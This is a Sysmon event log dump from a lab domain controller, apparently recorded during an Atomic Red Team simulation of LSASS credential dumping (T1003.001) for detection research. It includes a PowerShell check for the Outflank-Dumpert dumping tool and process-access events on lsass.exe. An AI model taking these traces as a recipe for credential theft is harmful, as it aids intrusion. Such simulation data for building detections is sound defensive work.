e95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025008Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.910{4DB9351A-A325-60D3-3706-00000000CF01}6172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if (Test-Path C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000025007Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A325-60D3-3606-00000000CF01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025006Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025005Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025004Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025003Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025002Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A325-60D3-3606-00000000CF01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025001Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.901{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A325-60D3-3606-00000000CF01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000025000Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.902{4DB9351A-A325-60D3-3606-00000000CF01}7096C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000024999Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.870{4DB9351A-A323-60D3-3406-00000000CF01}6980ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024998Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.952{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local55564- 354300x800000000000000024997Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.081{4DB9351A-9DEA-60D3-2D00-00000000CF01}2188C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-663.attackrange.local53982- 354300x800000000000000024996Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:54.174{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61526-false10.0.1.12-8000- 10341000x800000000000000024995Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.198{4DB9351A-A324-60D3-3506-00000000CF01}57326264C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 22542200x800000000000000024994Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.962{4DB9351A-A323-60D3-3406-00000000CF01}6980github.com0::ffff:192.30.255.113;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024993Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:57.089{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F11F582F164F2D76219874F959E04A32,SHA256=8894396792FF6C4BE72F70981774B1E3034D39445B0DCFCD82FC5875F13919B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.886{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=36B5A1649526A48960A683797F106FE7,SHA256=857E958974B08251267F186E1F50D3AEC6C5D10C13760957FD75D4A396170111,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.667{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82AF990464FEFA06C0D7912E6B19F340,SHA256=B059FE9127244AD54376C0615F6F8AE55F9E06DA490541ED87DC20E34C58F3A8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.573{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.573{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.542{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.542{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000025066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:58.526{4DB9351A-A326-60D3-3906-00000000CF01}6228\PSHost.132689561984637425.6228.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.510{4DB9351A-A326-60D3-3906-00000000CF01}6228ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_50kytcuq.lnh.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.510{4DB9351A-A326-60D3-3906-00000000CF01}6228ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_cwakm3zy.0rz.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.495{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_cwakm3zy.0rz.ps12021-06-23 21:09:58.495 10341000x800000000000000025062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.479{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.464{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.464{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.464{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.464{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.464{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.464{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:58.464{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A326-60D3-3906-00000000CF01}6228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 